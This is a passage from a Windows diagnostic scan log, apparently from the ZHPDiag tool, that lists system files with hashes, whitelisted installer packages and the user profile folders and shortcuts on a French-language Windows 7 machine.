[MD5.127AA81343A7C6F665C22CB1293B0A90] - [17/08/2012 10:14:23] - |A| - (.© Microsoft Corporation. - Print driver host for 32bit applications.) - [67072] - (6.1.7601.17777) - C:\Windows\splwow64.exe
[24/08/2012 16:19:06] - |D| - [831924] - C:\Windows\ssi
[MD5.9060C3C745E7B2D8E1A81DD061021546] - [14/07/2009 07:28:38] - |A| - (.-.) - [48201] - (0.0.0.0) - C:\Windows\Starter.xml
[14/07/2009 05:20:10] - |D| - [0] - C:\Windows\system
[MD5.286A9EDB379DC3423A528B0864A0F111] - [14/07/2009 04:34:57] - |A| - (.-.) - [219] - (0.0.0.0) - C:\Windows\system.ini
[14/07/2009 05:20:10] - |D| - [5076379228] - C:\Windows\System32
[14/07/2009 05:20:14] - |D| - [1784062883] - C:\Windows\SysWOW64
[14/07/2009 05:20:14] - |D| - [15] - C:\Windows\TAPI
[14/07/2009 05:20:14] - |D| - [37522] - C:\Windows\Tasks
[14/07/2009 05:20:14] - |D| - [442544] - C:\Windows\Temp
[14/07/2009 05:20:14] - |D| - [0] - C:\Windows\tracing
[MD5.0BEA3F79A36B1F67B2CE0F595524C77C] - [10/06/2009 23:41:17] - |A| - (.- Twain Source Manager (Image Acquisition Interface).) - [94784] - (1.7.0.0) - C:\Windows\twain.dll
[14/07/2009 07:32:38] - |D| - [6144] - C:\Windows\twain_32
[MD5.163A95975E1D8819E653AA3E961371CA] - [21/11/2010 05:25:10] - |A| - (.- Gestionnaire de sources Twain_32 (Image Acquisition Interface).) - [51200] - (1.7.1.3) - C:\Windows\twain_32.dll
[MD5.F36A271706EDD23C94956AFB56981184] - [14/07/2009 00:47:26] - |A| - (.- Twain_32.dll Client's 16-Bit Thunking Server.) - [49680] - (1.7.0.0) - C:\Windows\twunk_16.exe
[MD5.0BD6E68F3EA0DD62CD86283D86895381] - [14/07/2009 02:14:40] - |A| - (.- Twain.dll Client's 32-Bit Thunking Server.) - [31232] - (1.7.1.0) - C:\Windows\twunk_32.exe
[MD5.B38882E54F783A2C37946C27091DC8B4] - [07/02/2013 12:20:32] - |A| - (.(C) 2000-2009 Dritek System Inc. - Uninstall Application.) - [349776] - (2.1.2.2017) - C:\Windows\UNINSTLMv4.EXE
[14/07/2009 05:20:14] - |D| - [12420] - C:\Windows\Vss
[14/07/2009 05:20:14] - |D| - [40681427] - C:\Windows\Web
[MD5.162904DAA5412143F5403233E77F787E] - [14/07/2009 04:34:57] - |A| - (.-.) - [403] - (0.0.0.0) - C:\Windows\win.ini
[MD5.5A5CFF37F1BD0F86B9BDAAD7A9445882] - [14/07/2009 06:54:24] - |RAH| - (.-.) - [749] - (0.0.0.0) - C:\Windows\WindowsShell.Manifest
[MD5.EF8B6B4146596DAAEF44759B58975248] - [27/01/2013 19:38:33] - |A| - (.-.) - [1061864] - (0.0.0.0) - C:\Windows\WindowsUpdate.log
[MD5.1D420D66250BCAAAED05724FB34008CF] - [14/07/2009 02:12:29] - |A| - (.© Microsoft Corporation. Tous droits réservés. - Relais Windows Winhlp32.) - [9728] - (6.1.7600.16385) - C:\Windows\winhlp32.exe
[MD5.0A34066D56D57C0DA73BFFC1E4169FF2] - [27/06/2016 19:08:55] - |A| - (.-.) - [85] - (0.0.0.0) - C:\Windows\wininit.ini
[14/07/2009 05:20:14] - |D| - [22194383909] - C:\Windows\winsxs
[MD5.907AE50A03DEEC4CFFDC70EA3D5AD4D8] - [31/03/2014 22:34:22] - |A| - (.© 2012 Microsoft Corporation. Tous droits réservés. - Écran de veille de la Galerie de photos.) - [322248] - (16.4.3528.331) - C:\Windows\WLXPGSS.SCR
[MD5.DC17DD0189B0C36D863B4DD0A036C10F] - [10/06/2009 22:52:44] - |A| - (.-.) - [316640] - (0.0.0.0) - C:\Windows\WMSysPr9.prx
[MD5.F8ED3B4B209E2CB49028E36CF06CA851] - [14/07/2009 01:56:28] - |A| - (.© Microsoft Corporation. - Windows Write.) - [10240] - (6.1.7600.16385) - C:\Windows\write.exe

---------- | Systemroot\System


---------- | Systemroot\Installer (Microsoft Files Whitelisted)

[07/02/2016 17:42:37] - C:\Windows\Installer\1292391.msi : (Java SE Runtime Environment 8 Update 73 - Oracle Corporation)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[09/06/2010 07:22:04] - C:\Windows\Installer\13e3114c.msi : (PX Profile Update - AMD)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[26/03/2010 10:44:40] - C:\Windows\Installer\13e31152.msi : (Branding - ATI)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[09/06/2010 07:21:44] - C:\Windows\Installer\13e31158.msi : (Catalyst Control Center - ATI)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[09/06/2010 07:07:28] - C:\Windows\Installer\13e3115f.msi : (Catalyst Control Center - ATI)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[09/06/2010 07:07:40] - C:\Windows\Installer\13e31165.msi : (Catalyst Control Center - ATI)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[09/06/2010 07:07:54] - C:\Windows\Installer\13e3116b.msi : (Catalyst Control Center - ATI)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[09/06/2010 07:08:06] - C:\Windows\Installer\13e31171.msi : (Catalyst Control Center - ATI)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[09/06/2010 07:08:16] - C:\Windows\Installer\13e31177.msi : (Catalyst Control Center - ATI)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[09/06/2010 07:08:30] - C:\Windows\Installer\13e3117d.msi : (Catalyst Control Center - ATI)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[09/06/2010 07:08:40] - C:\Windows\Installer\13e31183.msi : (Catalyst Control Center - ATI)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[09/06/2010 07:08:52] - C:\Windows\Installer\13e31189.msi : (Catalyst Control Center - ATI)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[09/06/2010 07:09:04] - C:\Windows\Installer\13e3118f.msi : (Catalyst Control Center - ATI)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[09/06/2010 07:09:16] - C:\Windows\Installer\13e31195.msi : (Catalyst Control Center - ATI)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[09/06/2010 07:09:28] - C:\Windows\Installer\13e3119b.msi : (Catalyst Control Center - ATI)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[09/06/2010 07:09:38] - C:\Windows\Installer\13e311a1.msi : (Catalyst Control Center - ATI)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[09/06/2010 07:09:50] - C:\Windows\Installer\13e311a7.msi : (Catalyst Control Center - ATI)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[09/06/2010 07:10:02] - C:\Windows\Installer\13e311ad.msi : (Catalyst Control Center - ATI)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[09/06/2010 07:10:14] - C:\Windows\Installer\13e311b3.msi : (Catalyst Control Center - ATI)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[09/06/2010 07:10:24] - C:\Windows\Installer\13e311b9.msi : (Catalyst Control Center - ATI)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[09/06/2010 07:10:36] - C:\Windows\Installer\13e311bf.msi : (Catalyst Control Center - ATI)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[09/06/2010 07:10:48] - C:\Windows\Installer\13e311c5.msi : (Catalyst Control Center - ATI)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[09/06/2010 07:10:58] - C:\Windows\Installer\13e311cb.msi : (Catalyst Control Center - ATI)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[09/06/2010 07:11:10] - C:\Windows\Installer\13e311d1.msi : (Catalyst Control Center - ATI)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[09/06/2010 07:11:20] - C:\Windows\Installer\13e311d7.msi : (Catalyst Control Center - ATI)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[09/06/2010 07:11:32] - C:\Windows\Installer\13e311dd.msi : (Catalyst Control Center - ATI)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[09/06/2010 07:11:58] - C:\Windows\Installer\13e311e3.msi : (Catalyst Control Center - ATI)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[09/06/2010 07:12:36] - C:\Windows\Installer\13e311e9.msi : (Catalyst Control Center Utility 64 - ATI)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[09/06/2010 07:07:06] - C:\Windows\Installer\13e311f0.msi : (Catalyst Control Center - ATI)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[11/05/2016 00:08:25] - C:\Windows\Installer\2a40784f.msi : (Google Update Helper - Google Inc.)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[07/02/2013 12:20:50] - C:\Windows\Installer\376b9.msi : ( - Cisco Systems, Inc.)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[07/02/2013 12:20:50] - C:\Windows\Installer\376bf.msi : ( - Cisco Systems, Inc.)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[07/02/2013 12:20:50] - C:\Windows\Installer\376c5.msi : ( - Cisco Systems, Inc.)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[08/01/2013 22:06:00] - C:\Windows\Installer\376d1.msi : (Catalyst Control Center - Advanced Micro Devices, Inc.)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[08/01/2013 22:12:58] - C:\Windows\Installer\376d8.msi : (AMD Catalyst Install Manager Installer (64 bit) - Advanced Micro Devices, Inc.)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[09/08/2014 10:56:15] - C:\Windows\Installer\386e8403.msi : (Facebook Video Calling 3.1.0.521 - Skype Limited)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[17/03/2015 10:41:29] - C:\Windows\Installer\8b20960.msi : ( - Adobe Systems Incorporated)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[09/07/2016 10:05:22] - C:\Windows\Installer\de5a0.msi : (Skype - Skype Technologies S.A.)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[09/07/2016 10:13:17] - C:\Windows\Installer\de5a6.msi : (Java SE Runtime Environment 8 Update 91 - Oracle Corporation)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[09/07/2016 10:15:24] - C:\Windows\Installer\de5b3.msi : (Java Auto Updater - Oracle Corporation)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[09/07/2016 10:15:52] - C:\Windows\Installer\de5cf.msi : (Adobe AIR Installer - Adobe Systems Incorporated)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]
[12/07/2016 10:37:59] - C:\Windows\Installer\f9ed64f.msi : (Adobe ARM Installer - Adobe Systems Incorporated)          [Offsets ok ! : D0CF11E0A1B11AE10000000000000000]

---------- | %System%\*.in*

[14/07/2009 06:57:09] - [73] - C:\Windows\System32\desktop.ini
[14/04/2015 20:39:52] - [16303] - C:\Windows\System32\ieuinit.inf
[07/02/2013 12:21:44] - [707378] - C:\Windows\System32\oem5.inf
[14/07/2009 07:13:15] - [1734130] - C:\Windows\System32\PerfStringBackup.INI
[10/06/2009 23:01:25] - [60124] - C:\Windows\System32\tcpmon.ini
[14/04/2015 20:39:54] - [16303] - C:\Windows\Syswow64\ieuinit.inf
[06/03/2013 22:50:14] - [954] - C:\Windows\Syswow64\InstallUtil.InstallLog
[14/07/2009 06:55:01] - [57] - C:\Windows\Syswow64\mapisvc.inf
[17/08/2012 10:07:38] - [1709198] - C:\Windows\Syswow64\PerfStringBackup.INI

---------- | [Public]

[14/07/2009 05:20:08] - |RHD| - [7098182] - C:\Users\Public\Desktop
[14/07/2009 06:54:24] - |ASH| - [174] - C:\Users\Public\desktop.ini
[14/07/2009 05:20:08] - |RD| - [124036720] - C:\Users\Public\Documents
[14/07/2009 05:20:08] - |RD| - [174] - C:\Users\Public\Downloads
[14/07/2009 05:20:08] - |RHD| - [0] - C:\Users\Public\Favorites
[14/07/2009 05:20:08] - |RHD| - [964] - C:\Users\Public\Libraries
[14/07/2009 05:20:08] - |RD| - [17371874] - C:\Users\Public\Music
[14/07/2009 05:20:08] - |RD| - [5838651] - C:\Users\Public\Pictures
[14/07/2009 05:20:08] - |RD| - [26246732] - C:\Users\Public\Videos

---------- | [Utilisateur]

[07/02/2016 17:43:29] - |D| - [112] - C:\Users\Utilisateur\.oracle_jre_usage
[23/01/2014 15:14:44] - |D| - [430080] - C:\Users\Utilisateur\.swt
[16/04/2015 15:17:56] - |D| - [82147383] - C:\Users\Utilisateur\.Virtualbox.sav
[17/08/2012 09:53:31] - |HD| - [1884760114] - C:\Users\Utilisateur\AppData
[17/08/2012 09:53:32] - |SHD| - [0] - C:\Users\Utilisateur\Application Data
[17/08/2012 09:53:44] - |RD| - [172962] - C:\Users\Utilisateur\Contacts
[17/08/2012 09:53:32] - |SHD| - [2530] - C:\Users\Utilisateur\Cookies
[17/08/2012 09:53:31] - |RD| - [10767074181] - C:\Users\Utilisateur\Desktop
[17/08/2012 09:53:31] - |RD| - [72873718758] - C:\Users\Utilisateur\Documents
[17/08/2012 09:53:31] - |RD| - [10472992790] - C:\Users\Utilisateur\Downloads
[18/03/2015 20:47:24] - |D| - [0] - C:\Users\Utilisateur\dwhelper
[17/08/2012 09:53:31] - |RD| - [4438] - C:\Users\Utilisateur\Favorites
[17/08/2012 09:53:31] - |RD| - [3125] - C:\Users\Utilisateur\Links
[17/08/2012 09:53:32] - |SHD| - [1275860151] - C:\Users\Utilisateur\Local Settings
[17/08/2012 09:53:32] - |SHD| - [89442] - C:\Users\Utilisateur\Menu Démarrer
[17/08/2012 09:53:32] - |SHD| - [72873718758] - C:\Users\Utilisateur\Mes documents
[17/08/2012 09:53:32] - |SHD| - [0] - C:\Users\Utilisateur\Modèles
[17/08/2012 09:53:31] - |RD| - [15083527702] - C:\Users\Utilisateur\Music
[17/08/2012 09:53:31] - |ASH| - [20971520] - C:\Users\Utilisateur\ntuser.dat
[17/08/2012 09:53:31] - |ASH| - [262144] - C:\Users\Utilisateur\ntuser.dat.LOG1
[17/08/2012 09:53:31] - |ASH| - [0] - C:\Users\Utilisateur\ntuser.dat.LOG2
[17/08/2012 09:53:31] - |ASH| - [65536] - C:\Users\Utilisateur\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf
[17/08/2012 09:53:31] - |ASH| - [524288] - C:\Users\Utilisateur\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms
[17/08/2012 09:53:32] - |ASH| - [524288] - C:\Users\Utilisateur\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms
[17/07/2016 12:19:45] - |ASH| - [65536] - C:\Users\Utilisateur\ntuser.dat{29a1de83-4c05-11e6-91a4-1c7508dfa56f}.TM.blf
[17/07/2016 12:19:45] - |ASH| - [524288] - C:\Users\Utilisateur\ntuser.dat{29a1de83-4c05-11e6-91a4-1c7508dfa56f}.TMContainer00000000000000000001.regtrans-ms
[17/07/2016 12:19:45] - |ASH| - [524288] - C:\Users\Utilisateur\ntuser.dat{29a1de83-4c05-11e6-91a4-1c7508dfa56f}.TMContainer00000000000000000002.regtrans-ms
[23/01/2016 13:37:22] - |ASH| - [65536] - C:\Users\Utilisateur\ntuser.dat{4d46a0be-c1c5-11e5-a02c-1c7508dfa56f}.TM.blf
[23/01/2016 13:37:22] - |ASH| - [524288] - C:\Users\Utilisateur\ntuser.dat{4d46a0be-c1c5-11e5-a02c-1c7508dfa56f}.TMContainer00000000000000000001.regtrans-ms
[23/01/2016 13:37:22] - |ASH| - [524288] - C:\Users\Utilisateur\ntuser.dat{4d46a0be-c1c5-11e5-a02c-1c7508dfa56f}.TMContainer00000000000000000002.regtrans-ms
[24/07/2016 10:59:18] - |ASH| - [65536] - C:\Users\Utilisateur\ntuser.dat{d556aa42-517c-11e6-93ac-889ffa1c8ff7}.TM.blf
[24/07/2016 10:59:18] - |ASH| - [524288] - C:\Users\Utilisateur\ntuser.dat{d556aa42-517c-11e6-93ac-889ffa1c8ff7}.TMContainer00000000000000000001.regtrans-ms
[24/07/2016 10:59:18] - |ASH| - [524288] - C:\Users\Utilisateur\ntuser.dat{d556aa42-517c-11e6-93ac-889ffa1c8ff7}.TMContainer00000000000000000002.regtrans-ms
[10/06/2015 21:50:32] - |ASH| - [65536] - C:\Users\Utilisateur\ntuser.dat{dbe500c1-0fa9-11e5-95da-889ffa1c8ff7}.TM.blf
[10/06/2015 21:50:32] - |ASH| - [524288] - C:\Users\Utilisateur\ntuser.dat{dbe500c1-0fa9-11e5-95da-889ffa1c8ff7}.TMContainer00000000000000000001.regtrans-ms
[10/06/2015 21:50:32] - |ASH| - [524288] - C:\Users\Utilisateur\ntuser.dat{dbe500c1-0fa9-11e5-95da-889ffa1c8ff7}.TMContainer00000000000000000002.regtrans-ms
[17/07/2016 12:00:05] - |ASH| - [65536] - C:\Users\Utilisateur\ntuser.dat{ff01562e-4bff-11e6-8f0a-1c7508dfa56f}.TM.blf
[17/07/2016 12:00:05] - |ASH| - [524288] - C:\Users\Utilisateur\ntuser.dat{ff01562e-4bff-11e6-8f0a-1c7508dfa56f}.TMContainer00000000000000000001.regtrans-ms
[17/07/2016 12:00:05] - |ASH| - [524288] - C:\Users\Utilisateur\ntuser.dat{ff01562e-4bff-11e6-8f0a-1c7508dfa56f}.TMContainer00000000000000000002.regtrans-ms
[24/07/2016 11:00:35] - |ASH| - [65536] - C:\Users\Utilisateur\ntuser.dat{ffaac920-517c-11e6-8f2c-889ffa1c8ff7}.TM.blf
[24/07/2016 11:00:35] - |ASH| - [524288] - C:\Users\Utilisateur\ntuser.dat{ffaac920-517c-11e6-8f2c-889ffa1c8ff7}.TMContainer00000000000000000001.regtrans-ms
[24/07/2016 11:00:35] - |ASH| - [524288] - C:\Users\Utilisateur\ntuser.dat{ffaac920-517c-11e6-8f2c-889ffa1c8ff7}.TMContainer00000000000000000002.regtrans-ms
[17/08/2012 09:53:32] - |SH| - [20] - C:\Users\Utilisateur\ntuser.ini
[17/08/2012 09:53:31] - |RD| - [24812229855] - C:\Users\Utilisateur\Pictures
[17/08/2012 09:53:32] - |SHD| - [193008] - C:\Users\Utilisateur\Recent
[17/08/2012 09:53:31] - |RD| - [282] - C:\Users\Utilisateur\Saved Games
[17/08/2012 09:53:56] - |RD| - [1020] - C:\Users\Utilisateur\Searches
[17/08/2012 09:53:32] - |SHD| - [2573] - C:\Users\Utilisateur\SendTo
[12/11/2013 17:36:09] - |RD| - [247483516] - C:\Users\Utilisateur\SkyDrive
[25/06/2016 01:31:30] - |D| - [0] - C:\Users\Utilisateur\Start Menu
[17/08/2012 10:18:07] - |D| - [925696] - C:\Users\Utilisateur\Tracing
[17/08/2012 09:53:31] - |RD| - [29232461813] - C:\Users\Utilisateur\Videos
[17/08/2012 09:53:32] - |SHD| - [0] - C:\Users\Utilisateur\Voisinage d'impression
[17/08/2012 09:53:32] - |SHD| - [0] - C:\Users\Utilisateur\Voisinage réseau
[16/04/2015 15:17:56] - |D| - [1112526] - C:\Users\Utilisateur\youwave
[06/04/2014 16:53:19] - |D| - [15068451] - C:\Users\Utilisateur\AppData\Roaming\Ableton
[17/08/2012 10:22:10] - |D| - [9997753] - C:\Users\Utilisateur\AppData\Roaming\Adobe
[17/08/2012 11:51:24] - |D| - [18458] - C:\Users\Utilisateur\AppData\Roaming\Auslogics
[17/07/2016 12:04:47] - |D| - [142] - C:\Users\Utilisateur\AppData\Roaming\AVAST Software
[27/01/2013 19:20:42] - |A| - [387] - C:\Users\Utilisateur\AppData\Roaming\burnaware.ini
[25/02/2013 20:36:46] - |D| - [1423761] - C:\Users\Utilisateur\AppData\Roaming\Camfrog
[17/08/2012 10:13:55] - |D| - [1492] - C:\Users\Utilisateur\AppData\Roaming\Canneverbe Limited
[08/04/2013 23:11:14] - |D| - [203] - C:\Users\Utilisateur\AppData\Roaming\dvdcss
[31/10/2015 19:15:15] - |D| - [690584] - C:\Users\Utilisateur\AppData\Roaming\DVDVideoSoft
[17/08/2012 09:53:47] - |D| - [0] - C:\Users\Utilisateur\AppData\Roaming\Identities
[07/02/2013 12:20:53] - |D| - [0] - C:\Users\Utilisateur\AppData\Roaming\InstallShield
[07/02/2013 12:30:44] - |D| - [0] - C:\Users\Utilisateur\AppData\Roaming\Intel Corporation
[19/05/2016 20:40:35] - |D| - [520] - C:\Users\Utilisateur\AppData\Roaming\IsolatedStorage
[17/08/2012 11:22:15] - |D| - [58224] - C:\Users\Utilisateur\AppData\Roaming\Macromedia
[17/08/2012 10:08:01] - |D| - [0] - C:\Users\Utilisateur\AppData\Roaming\Malwarebytes
[17/08/2012 09:53:31] - |D| - [0] - C:\Users\Utilisateur\AppData\Roaming\Media Center Programs
[17/08/2012 09:53:31] - |SD| - [21815309] - C:\Users\Utilisateur\AppData\Roaming\Microsoft
[08/02/2013 16:55:05] - |D| - [201070177] - C:\Users\Utilisateur\AppData\Roaming\Mozilla
[17/08/2012 10:55:37] - |D| - [2162] - C:\Users\Utilisateur\AppData\Roaming\PeerNetworking
[08/02/2013 16:43:38] - |D| - [88189828] - C:\Users\Utilisateur\AppData\Roaming\Skype
[17/08/2012 10:23:51] - |D| - [5087333] - C:\Users\Utilisateur\AppData\Roaming\SoftGrid Client
[07/02/2016 17:43:30] - |D| - [0] - C:\Users\Utilisateur\AppData\Roaming\Sun
[23/08/2012 11:49:44] - |D| - [28922] - C:\Users\Utilisateur\AppData\Roaming\TeamViewer
[16/02/2013 18:44:22] - |D| - [151122] - C:\Users\Utilisateur\AppData\Roaming\Todae
[17/08/2012 10:14:08] - |D| - [982599] - C:\Users\Utilisateur\AppData\Roaming\TP
[31/10/2015 19:24:16] - |D| - [6022] - C:\Users\Utilisateur\AppData\Roaming\TuneUp Software
[18/03/2013 20:36:15] - |D| - [14192] - C:\Users\Utilisateur\AppData\Roaming\Unity
[19/12/2012 17:20:19] - |D| - [105137] - C:\Users\Utilisateur\AppData\Roaming\vlc
[14/10/2013 05:29:56] - |D| - [290913] - C:\Users\Utilisateur\AppData\Roaming\Wargaming.net
[19/12/2013 07:10:36] - |A| - [189] - C:\Users\Utilisateur\AppData\Roaming\WB.CFG
[16/02/2013 18:44:10] - |D| - [100820] - C:\Users\Utilisateur\AppData\Roaming\Winamp
[22/12/2014 18:04:19] - |D| - [0] - C:\Users\Utilisateur\AppData\Roaming\Windows Live Writer
[10/10/2013 22:02:06] - |D| - [12] - C:\Users\Utilisateur\AppData\Roaming\WinRAR
[16/07/2016 11:45:46] - |D| - [55114115] - C:\Users\Utilisateur\AppData\Roaming\ZHP
[17/08/2012 10:22:10] - |D| - [39220308] - C:\Users\Utilisateur\AppData\Local\Adobe
[17/08/2012 09:53:32] - |SHD| - [0] - C:\Users\Utilisateur\AppData\Local\Application Data
[24/01/2014 23:40:15] - |D| - [2872] - C:\Users\Utilisateur\AppData\Local\ApplicationHistory
[28/10/2013 23:14:27] - |D| - [2030676] - C:\Users\Utilisateur\AppData\Local\Bouygues Telecom
[07/12/2013 01:27:56] - |D| - [0] - C:\Users\Utilisateur\AppData\Local\cache
[18/11/2015 21:27:58] - |D| - [772] - C:\Users\Utilisateur\AppData\Local\Camfrog
[28/07/2015 17:26:58] - |D| - [0] - C:\Users\Utilisateur\AppData\Local\CEF
[25/01/2014 00:45:39] - |D| - [0] - C:\Users\Utilisateur\AppData\Local\Chromium
[17/02/2016 21:09:19] - |D| - [9427656] - C:\Users\Utilisateur\AppData\Local\Diagnostics
[23/02/2013 21:19:01] - |D| - [647083] - C:\Users\Utilisateur\AppData\Local\ElevatedDiagnostics
[13/06/2015 10:27:33] - |SHD| - [0] - C:\Users\Utilisateur\AppData\Local\EmieBrowserModeList
[19/08/2014 07:57:28] - |SHD| - [0] - C:\Users\Utilisateur\AppData\Local\EmieSiteList
[19/08/2014 07:57:28] - |SHD| - [0] - C:\Users\Utilisateur\AppData\Local\EmieUserList
[24/01/2014 23:40:15] - |A| - [99] - C:\Users\Utilisateur\AppData\Local\fusioncache.dat
[17/08/2012 10:07:48] - |A| - [111448] - C:\Users\Utilisateur\AppData\Local\GDIPFONTCACHEV1.DAT
[17/08/2012 10:06:01] - |D| - [853328569] - C:\Users\Utilisateur\AppData\Local\Google
[06/06/2015 10:34:11] - |D| - [71] - C:\Users\Utilisateur\AppData\Local\GWX
[17/08/2012 09:53:32] - |SHD| - [0] - C:\Users\Utilisateur\AppData\Local\Historique
[24/07/8316 13:23:27] - |AH| - [1095944] - C:\Users\Utilisateur\AppData\Local\IconCache.db
[09/02/2013 13:31:26] - |D| - [0] - C:\Users\Utilisateur\AppData\Local\Macromedia
[17/08/2012 09:53:31] - |D| - [316332339] - C:\Users\Utilisateur\AppData\Local\Microsoft
[14/11/2013 13:47:02] - |D| - [0] - C:\Users\Utilisateur\AppData\Local\Microsoft Help
[27/03/2014 00:22:18] - |DC| - [0] - C:\Users\Utilisateur\AppData\Local\MigWiz
[08/02/2013 16:55:05] - |D| - [46736055] - C:\Users\Utilisateur\AppData\Local\Mozilla
[26/11/2013 23:04:34] - |D| - [1046] - C:\Users\Utilisateur\AppData\Local\Packages
[27/01/2013 19:19:46] - |D| - [0] - C:\Users\Utilisateur\AppData\Local\Programs
[17/08/2012 10:55:38] - |A| - [44] - C:\Users\Utilisateur\AppData\Local\RAContactHistory.xml
[15/04/2014 23:14:35] - |D| - [0] - C:\Users\Utilisateur\AppData\Local\Skype
[17/08/2012 10:23:51] - |D| - [4726784] - C:\Users\Utilisateur\AppData\Local\SoftGrid Client
[17/08/2012 09:53:31] - |D| - [476538] - C:\Users\Utilisateur\AppData\Local\Temp
[10/04/2015 22:49:46] - |A| - [11774] - C:\Users\Utilisateur\AppData\Local\Temp-log.txt
[17/08/2012 09:53:32] - |SHD| - [138749] - C:\Users\Utilisateur\AppData\Local\Temporary Internet Files
[31/10/2015 19:24:16] - |D| - [20415] - C:\Users\Utilisateur\AppData\Local\TuneUp Software
[24/01/2014 23:56:09] - |D| - [1959314] - C:\Users\Utilisateur\AppData\Local\Turbine
[18/03/2013 04:01:45] - |D| - [0] - C:\Users\Utilisateur\AppData\Local\Unity
[17/08/2012 09:53:43] - |D| - [0] - C:\Users\Utilisateur\AppData\Local\VirtualStore
[04/10/2013 11:58:12] - |D| - [0] - C:\Users\Utilisateur\AppData\Local\WarThunder
[17/08/2012 10:10:09] - |D| - [57344] - C:\Users\Utilisateur\AppData\Local\Windows Live
[22/12/2014 18:04:19] - |D| - [648363] - C:\Users\Utilisateur\AppData\Local\Windows Live Writer
[17/08/2012 09:53:56] - |ASH| - [174] - C:\Users\Utilisateur\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
[17/08/2012 09:53:32] - |SHD| - [44634] - C:\Users\Utilisateur\AppData\Roaming\Microsoft\Windows\Start Menu\Programmes
[17/08/2012 09:53:31] - |RD| - [44634] - C:\Users\Utilisateur\AppData\Roaming\Microsoft\Windows\Start Menu\Programs
[06/04/2014 16:50:37] - |A| - [881] - C:\Users\Utilisateur\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Ableton Live 9 Trial.lnk
[17/08/2012 09:53:31] - |RD| - [14256] - C:\Users\Utilisateur\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories
[17/08/2012 09:53:56] - |RD| - [174] - C:\Users\Utilisateur\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools
[13/06/2015 11:14:42] - |D| - [2704] - C:\Users\Utilisateur\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Applications Chrome
[18/11/2015 21:27:46] - |D| - [5771] - C:\Users\Utilisateur\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Camfrog Video Chat
[10/05/2016 06:50:39] - |D| - [5771] - C:\Users\Utilisateur\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Camfrog Video Chat 6.4
[16/02/2013 18:49:19] - |D| - [0] - C:\Users\Utilisateur\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chronotron Inc
[17/08/2012 09:53:56] - |ASH| - [476] - C:\Users\Utilisateur\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini
[13/06/2015 11:14:39] - |D| - [2383] - C:\Users\Utilisateur\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google Chrome
[17/08/2012 09:53:58] - |A| - [1092] - C:\Users\Utilisateur\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer 32.lnk
[17/08/2012 09:54:01] - |A| - [905] - C:\Users\Utilisateur\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer 64.lnk
[04/05/2013 12:42:23] - |A| - [1092] - C:\Users\Utilisateur\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
[17/08/2012 09:53:31] - |RD| - [580] - C:\Users\Utilisateur\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance
[22/12/2014 17:36:37] - |A| - [2254] - C:\Users\Utilisateur\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Microsoft OneDrive.lnk
[03/08/2015 17:14:20] - |A| - [861] - C:\Users\Utilisateur\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Start Tor Browser.lnk
